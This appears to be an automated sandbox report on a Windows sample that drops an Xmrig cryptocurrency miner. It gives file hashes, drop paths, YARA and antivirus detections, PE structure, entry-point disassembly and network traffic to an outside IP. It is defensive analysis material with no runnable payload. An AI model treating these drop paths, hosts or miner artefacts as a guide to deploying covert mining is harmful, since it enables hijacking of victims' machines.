C:\Program Files\Google\Libs\WR64.sys | SecuriteInfo.com.Trojan.Siggen25.64233.10125.12605.exe | Get hash | malicious | Xmrig | Browse |
C:\Program Files\Google\Libs\WR64.sys | FxeLOSQQNf.exe | Get hash | malicious | Xmrig | Browse |
C:\Program Files\Google\Libs\WR64.sys | AvzR5wP0YM.exe | Get hash | malicious | Xmrig | Browse |
C:\Program Files\Google\Libs\WR64.sys | 1FTe3IQdAZ.exe | Get hash | malicious | Xmrig | Browse |
C:\Program Files\Google\Libs\WR64.sys | Bbd9GbGTz6.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Xmrig | Browse |
C:\Program Files\Google\Libs\WR64.sys | hpNwtEJWBl.exe | Get hash | malicious | RedLine, Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | file.exe | Get hash | malicious | Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | file.exe | Get hash | malicious | Glupteba, SmokeLoader, Stealc, Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | file.exe | Get hash | malicious | Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | kwF74BLoxA.exe | Get hash | malicious | Glupteba, Petite Virus, SmokeLoader, Socks5Systemz, Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | file.exe | Get hash | malicious | Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | GWNK2KJZ1G.exe | Get hash | malicious | Glupteba, RedLine, SmokeLoader, Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | SecuriteInfo.com.Trojan.MulDropNET.43.27711.8559.exe | Get hash | malicious | Glupteba, RedLine, SmokeLoader, Vidar, Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | SecuriteInfo.com.Trojan.MulDropNET.43.21623.5556.exe | Get hash | malicious | Glupteba, RedLine, SmokeLoader, Vidar, Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | upw82ArDKW.exe | Get hash | malicious | Glupteba, RedLine, SmokeLoader, Xmrig | Browse |
C:\Windows\Temp\wbiwcikhpmwr.tmp | BjKYLUw8UN.exe | Get hash | malicious | Glupteba, RedLine, SmokeLoader, Vidar, Xmrig | Browse |
Process: C:\Program Files\MINA\m.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14544
Entropy (8bit): 6.2660301556221185
Encrypted: false
SSDEEP: 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5: 0C0195C48B6B8582FA6F6373032118DA
SHA1: D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512: AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious: true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: HEzzgzqOfv.exe, Detection: malicious, Browse
                                                                                      • Filename: FV0mIIfKwQ.exe, Detection: malicious, Browse
                                                                                      • Filename: google-chrome-stable_x86_64-patch.v0.533.exe, Detection: malicious, Browse
                                                                                      • Filename: AffoeAIM.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Trojan.Siggen25.64233.10125.12605.exe, Detection: malicious, Browse
                                                                                      • Filename: FxeLOSQQNf.exe, Detection: malicious, Browse
                                                                                      • Filename: AvzR5wP0YM.exe, Detection: malicious, Browse
                                                                                      • Filename: 1FTe3IQdAZ.exe, Detection: malicious, Browse
                                                                                      • Filename: Bbd9GbGTz6.exe, Detection: malicious, Browse
                                                                                      • Filename: hpNwtEJWBl.exe, Detection: malicious, Browse
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):5827072
Entropy (8bit):7.715684778151957
Encrypted:false
SSDEEP:98304:jtFdnoyNMWDUWe4HVEceiM9N7/FErSxMC504f+18:j7+yKIU6VEceiSp/mSxL5JB
MD5:7E78C4388E398CD5113BE95855753C9A
SHA1:ED6ABDCCF206689D48CC1ADAC47A3A71B100D822
SHA-256:7FDCF0389689AE53B0EE7A302DC69963E7F5B3CE911B772792689B05D7F02F67
SHA-512:D18F52399BE73636212C88A450022B78232480798AC6E66B73063589A2FDAC684AF0C7336A5225DE7270C5DF1E2D7CD988B1CBC616C24BB09F5359151B31FE54
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 53%
• Antivirus: Virustotal, Detection: 62%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.d............`Y.0...........................`.X.(...................."Y.P............................text...............................`..`.data.....V.......V.................@....rdata...9....X..:...vX.............@..@.pdata..d.....X.......X.............@..@.xdata........X.......X.............@..@.bss.... .....Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:NlllulJnp/p:NllU
MD5:BC6DB77EB243BF62DC31267706650173
SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:false
Preview:@...e.................................X..............@..........

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Program Files\MINA\m.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5536256
                                                                                      Entropy (8bit):6.689058470432344
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                                      MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                                      SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                                      SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                                      SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, Author: Joe Security
                                                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, Author: unknown
                                                                                      • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, Author: Florian Roth
                                                                                      • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, Author: ditekSHen
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 64%
                                                                                      • Antivirus: Virustotal, Detection: 74%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: kwF74BLoxA.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: GWNK2KJZ1G.exe, Detection: malicious
                                                                                      • Filename: SecuriteInfo.com.Trojan.MulDropNET.43.27711.8559.exe, Detection: malicious
                                                                                      • Filename: SecuriteInfo.com.Trojan.MulDropNET.43.21623.5556.exe, Detection: malicious
                                                                                      • Filename: upw82ArDKW.exe, Detection: malicious
                                                                                      • Filename: BjKYLUw8UN.exe, Detection: malicious
                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                                                                                      File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                      Entropy (8bit):7.715684778151957
                                                                                      TrID:
                                                                                      • Win64 Executable (generic) (12005/4) 74.95%
                                                                                      • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                      • DOS Executable Generic (2002/1) 12.50%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                      File name:SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                                                                                      File size:5'827'072 bytes
                                                                                      MD5:7e78c4388e398cd5113be95855753c9a
                                                                                      SHA1:ed6abdccf206689d48cc1adac47a3a71b100d822
                                                                                      SHA256:7fdcf0389689ae53b0ee7a302dc69963e7f5b3ce911b772792689b05d7f02f67
                                                                                      SHA512:d18f52399be73636212c88a450022b78232480798ac6e66b73063589a2fdac684af0c7336a5225de7270c5df1e2d7cd988b1cbc616c24bb09f5359151b31fe54
                                                                                      SSDEEP:98304:jtFdnoyNMWDUWe4HVEceiM9N7/FErSxMC504f+18:j7+yKIU6VEceiSp/mSxL5JB
                                                                                      TLSH:5946E037C6712C9CF27E077AB9C4931446E3F6F543A7FB0F22A498669428B867E1914C
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e...............&......X................@.............................pY.......Y...`... ............................
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x1400014b0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x65D08612 [Sat Feb 17 10:10:26 2024 UTC]
                                                                                      TLS Callbacks:0x4000edc0, 0x1, 0x4000ed90, 0x1
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f7505c167603909b7180406402fef19e
                                                                                      Instruction
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      dec eax
                                                                                      mov eax, dword ptr [0058ACA5h]
                                                                                      mov dword ptr [eax], 00000001h
                                                                                      call 00007F382CFBE06Fh
                                                                                      nop
                                                                                      nop
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      ret
                                                                                      nop dword ptr [eax]
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      dec eax
                                                                                      mov eax, dword ptr [0058AC85h]
                                                                                      mov dword ptr [eax], 00000000h
                                                                                      call 00007F382CFBE04Fh
                                                                                      nop
                                                                                      nop
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      ret
                                                                                      nop dword ptr [eax]
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      call 00007F382CFD4EE4h
                                                                                      dec eax
                                                                                      test eax, eax
                                                                                      sete al
                                                                                      movzx eax, al
                                                                                      neg eax
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      ret
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      dec eax
                                                                                      lea ecx, dword ptr [00000009h]
                                                                                      jmp 00007F382CFBE389h
                                                                                      nop dword ptr [eax+00h]
                                                                                      ret
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      nop
                                                                                      dec eax
                                                                                      lea eax, dword ptr [0058F7E9h]
                                                                                      dec eax
                                                                                      lea edx, dword ptr [eax+21h]
                                                                                      mov byte ptr [eax], 00000000h
                                                                                      dec eax
                                                                                      add eax, 01h
                                                                                      dec eax
                                                                                      cmp eax, edx
                                                                                      jne 00007F382CFBE3A6h
                                                                                      ret
                                                                                      dec eax
                                                                                      lea eax, dword ptr [0058F791h]
                                                                                      dec eax
                                                                                      lea edx, dword ptr [eax+18h]
                                                                                      mov word ptr [eax], 0000h
                                                                                      dec eax
                                                                                      add eax, 02h
                                                                                      dec eax
                                                                                      cmp eax, edx
                                                                                      jne 00007F382CFBE3A4h
                                                                                      ret
                                                                                      dec eax
                                                                                      lea eax, dword ptr [0058F757h]
                                                                                      dec eax
                                                                                      lea edx, dword ptr [eax+14h]
                                                                                      mov word ptr [eax], 0000h
                                                                                      dec eax
                                                                                      add eax, 02h
                                                                                      dec eax
                                                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x592000 | 0xa34 | .idata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x595000 | 0x388 | .rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x58d000 | 0x1164 | .pdata
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x596000 | 0x330 | .reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x58b760 | 0x28 | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x59228c | 0x250 | .idata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                      .text | 0x1000 | 0x19210 | 0x19400 | 64a906e03990c2829ba362db9536062d | False | 0.47239518873762376 | data | 6.169538635167468 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .data | 0x1b000 | 0x56dcc0 | 0x56de00 | bbb6f156c4e46eba09dd0b108ee705df | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rdata | 0x589000 | 0x39d0 | 0x3a00 | 7391eb546fcab3fd215395ecbd209601 | False | 0.3618669181034483 | data | 5.11526840732268 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .pdata | 0x58d000 | 0x1164 | 0x1200 | 749ee8117bcf7707da73d683b524ba14 | False | 0.4657118055555556 | data | 5.050288854964238 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .xdata | 0x58f000 | 0xef8 | 0x1000 | 07dd20b4b9bea4671206281ec7c92e7d | False | 0.241455078125 | data | 4.017470182913128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .bss | 0x590000 | 0x1c20 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .idata | 0x592000 | 0xa34 | 0xc00 | ac973ea057d545434dccfa01fc4d806f | False | 0.3043619791666667 | data | 3.8909104495908764 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .CRT | 0x593000 | 0x60 | 0x200 | c4cd26a7dd58425fcc2e1be3a3579e3c | False | 0.068359375 | data | 0.28655982431271465 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .tls | 0x594000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc | 0x595000 | 0x388 | 0x400 | d10e223bbf97f0d8420bf4961741370a | False | 0.4501953125 | data | 5.021175165149536 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .reloc | 0x596000 | 0x330 | 0x400 | 253140b04ff5c46f387d1afe44a5fe41 | False | 0.5673828125 | data | 4.740165763904759 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                      RT_MANIFEST | 0x595058 | 0x330 | XML 1.0 document, ASCII text | English | United States | 0.508578431372549
                                                                                      DLL | Import
                                                                                      KERNEL32.dll | CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
                                                                                      msvcrt.dll | __C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                                                      Language of compilation system | Country where language is spoken | Map
                                                                                      English | United States | (map image not included in this export)
                                                                                      TCP packets
                                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Feb 18, 2024 19:39:17.677126884 CET | 49712 | 10128 | 192.168.2.5 | 44.196.193.227
                                                                                      Feb 18, 2024 19:39:17.771233082 CET | 10128 | 49712 | 44.196.193.227 | 192.168.2.5
